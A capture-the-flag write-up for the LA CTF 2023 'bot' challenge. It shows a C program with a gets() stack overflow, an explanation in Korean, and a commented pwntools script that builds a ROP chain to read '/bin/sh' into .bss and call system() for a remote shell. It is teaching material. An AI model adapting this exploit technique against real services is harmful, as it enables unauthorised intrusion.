La CTF 2023 - bot

I made a bot to automatically answer all of your questions.
nc lac.tf 31180

  • [197 solves / 363 points]

Analysis

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Challenge entry point: reads one line from stdin and answers a fixed set
 * of questions by exact string comparison.
 *
 * Security-relevant points:
 *  - gets() takes no length argument, so a line longer than the 64-byte
 *    `input` buffer is written past its end (stack buffer overflow).
 *    gets() was removed from the language in C11 for this reason.
 *  - give_flag is initialised to 0 and never assigned again in this
 *    function, so the flag branch cannot be reached by normal control flow.
 *  - A bounded read such as fgets(input, sizeof input, stdin), with the
 *    trailing newline stripped before the strcmp() chain, removes the
 *    overflow.
 */
int main(void) {
/* Disable stdout buffering so each puts() is written out immediately. */
setbuf(stdout, NULL);
char input[64];
/* volatile: the compiler must re-read the value at the check below. */
/* NOTE(review): where this sits relative to `input` on the stack depends on
 * the compiler; the write-up states it cannot be reached from the input. */
volatile int give_flag = 0;
puts("hi, how can i help?");
/* Unbounded read: copies until newline/EOF regardless of sizeof(input). */
gets(input);
/* strcmp() compares only up to the first NUL byte, whereas gets() keeps
 * copying past embedded NULs, so the string that is compared and the bytes
 * actually stored on the stack can differ. */
if (strcmp(input, "give me the flag") == 0) {
puts("lol no");
} else if (strcmp(input, "please give me the flag") == 0) {
puts("no");
} else if (strcmp(input, "help, i have no idea how to solve this") == 0) {
puts("L");
} else if (strcmp(input, "may i have the flag?") == 0) {
puts("not with that attitude");
} else if (strcmp(input, "please please please give me the flag") == 0) {
puts("i'll consider it");
/* Waits 15 seconds before checking give_flag. */
sleep(15);
if (give_flag) {
puts("ok here's your flag");
/* Runs a shell command; this call is also why system() is linked in. */
system("cat flag.txt");
} else {
puts("no");
}
} else {
puts("sorry, i didn't understand your question");
/* exit() ends the process here without returning from main; every other
 * branch falls off the end of main and returns through the saved return
 * address. */
exit(1);
}
}

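입력 값으로는 give_flag 변수의 값을 바꿀 수 없다. 하지만 gets(input)에는 길이 제한이 없어서 64바이트 버퍼를 넘어 리턴 주소까지 덮어쓸 수 있다. 다행히 바이너리에 system 함수 주소가 존재하니, bss 영역에 ‘/bin/sh\x00’을 쓰고 system 함수를 실행시키면 된다. 근본 원인은 gets 사용이므로, fgets처럼 길이를 제한하는 입력 함수로 바꾸면 이 오버플로는 발생하지 않는다.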

Solve

Exploit Code

from pwn import *

# Solve script for the "bot" challenge: overflows the 64-byte `input` buffer
# through gets() and replaces main's saved return address with a short chain
# of calls into code that already exists in the binary.
#
# What the chain depends on, and what would stop it:
#   - the unbounded gets() call (a bounded read removes the overflow);
#   - absolute addresses being known in advance (presumably a non-PIE build,
#     confirm with checksec; PIE + ASLR would require a leak first);
#   - the return address being overwritable without detection (presumably no
#     stack canary, confirm with checksec).

# Tell pwntools the target is 64-bit x86.
context.arch = 'amd64'
# context.log_level = 'DEBUG'

# p = process('./bot')
# Connect to the challenge service; the commented line above runs a local copy.
p = remote('lac.tf', 31180)
# Parse the local binary so PLT/symbol addresses can be looked up by name.
e = ELF('./bot')

# Hard-coded code addresses inside the binary.
# pop_rdi: presumably a `pop rdi; ret` sequence, used to load the first
# argument register. ret: presumably a bare `ret`, referenced only by the
# commented-out lines below (likely kept for stack alignment; unused here).
pop_rdi = 0x40133b
ret = 0x401016

# Begin with a question the program recognises, NUL-terminated. strcmp() stops
# at the NUL, so main takes a branch that returns normally; the final else
# branch calls exit(1) and would never use the saved return address.
payload = b'may i have the flag?\x00'
# Fill the rest of the 64-byte buffer.
payload += b'A' * (64 - len(payload))
# Next 8 bytes: presumably the saved frame pointer, directly before the
# saved return address.
payload += b'B' * 8
# First call: gets(0x404068). 0x404068 is a fixed writable address; the
# write-up describes it as being in the .bss region.
payload += p64(pop_rdi)
payload += p64(0x404068)
# payload += p64(ret)
payload += p64(e.plt['gets'])

# Second call: system(0x404068), using whatever the gets() above stored there.
payload += p64(pop_rdi)
payload += p64(0x404068)
# payload += p64(ret)
payload += p64(e.sym['system'])

# Blocks until the operator continues; typically a debugger-attach point.
pause()
# Wait for the '?' that ends the greeting "hi, how can i help?", then send.
# NOTE(review): '?' here and the string on the next line are str, not bytes;
# pwntools on Python 3 warns about this and assumes an encoding. Bytes
# literals would make the intent explicit.
p.sendlineafter('?', payload)
# Second line of input, consumed by the chained gets() call.
p.sendline('/bin/sh\x00')

# Hand the connection over to the terminal.
p.interactive()

Flag

lactf{hey_stop_bullying_my_bot_thats_not_nice}